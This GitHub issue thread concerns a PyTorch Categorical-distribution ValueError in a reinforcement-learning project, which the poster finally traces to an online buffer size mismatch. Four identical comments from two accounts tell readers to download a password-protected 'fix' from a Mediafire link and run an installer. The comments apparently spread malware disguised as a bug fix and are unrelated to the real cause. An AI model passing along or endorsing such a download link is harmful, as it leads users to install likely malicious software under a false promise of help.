### ISSUE TITLE
Value Error in Policy and Value Network

### ISSUE THREAD

**Issue by 24neurons** [24neurons/MTRL-Privacy#1]
# **Agent Bug**
## 1. Bug report 
ValueError: Expected value argument (Tensor of shape (12,)) to be within the support (IntegerInterval(lower_bound=0, upper_bound=2)) of the distribution Categorical(logits: torch.Size([12, 3])), but found invalid values:
tensor([-228093,  0 0 0 0 ]]
<img width="921" alt="Screenshot 2024-08-27 at 10 19 02" src="https://github.com/user-attachments/assets/14c7c269-d70e-4eb4-aacd-a0142e31dc70">

* Editor: Kaggle

2. Explaination

Suspension: `valid_arguments` turned on in `Categorical` distribution

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 24neurons** [comment]
Reopen for comment

**Comment by 24neurons** [comment]
Answer: Problem figured out, it was because of the buffer size exceeding the online buffer size. 
Solution: Change online buffer size to num_steps defined.
